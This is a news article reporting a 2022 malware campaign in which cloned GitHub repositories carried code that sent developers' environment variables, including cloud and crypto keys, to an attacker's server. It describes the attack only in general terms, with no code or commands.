Major developer platform GitHub faced a widespread malware attack, reporting 35,000 “code hits” in a day that saw millions of dollars drained from Solana-based wallets.
GitHub developer Stephen Lucy, who first reported the incident earlier on Wednesday, highlighted the widespread attack. The developer ran into the issue while reviewing a project that he found in a Google search.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9— Stephen Lacy (@stephenlacy) August 3, 2022
I am discovering what appears to be a massive malware attack on @github.
– Currently more than 35,000 repositories are infected
– So far found in projects like: crypto, golang, python, js, bash, docker, k8s
– Added to npm scripts, docker images and installation docs
So far, several projects—from crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes—have been found affected by the attack. The malware attack targets Docker images, installation documents, and the NPM script, which is a convenient way to bundle common shell commands for a project.
To trick developers into accessing critical data, andThe attacker first creates a fake repository (a repository contains all project files and the revision history of each file) and pushes clones of legitimate projects to GitHub. For example, the following two snapshots show this legitimate cryptocurrency miner project and its clone.
Many of these cloned repositories were pushed as “pull requests,” which allow developers to communicate changes they’ve pushed to a repository branch on GitHub to others.
Once the developer falls prey to the malware attack, the entire environment variable (ENV) of the script, application, or laptop (Electron apps) is sent to the attacker’s server. The ENV includes security keys, access keys to Amazon Web Services, crypto keys and much more.
The developer has reported the issue to GitHub and has advised developers to GPG-sign any revisions they make to the repository. GPG keys add an extra layer of security to GitHub accounts and software projects by providing a way to verify that all revisions come from a trusted source.
Clarification: The information and/or opinions expressed in this article do not necessarily represent the views or editorial line of Cointelegraph. The information set forth herein should not be taken as financial advice or investment recommendation. All investment and commercial movement involve risks and it is the responsibility of each person to do their due research before making an investment decision.
Investments in crypto assets are not regulated. They may not be suitable for retail investors and the full amount invested may be lost. The services or products offered are not aimed at or accessible to investors in Spain.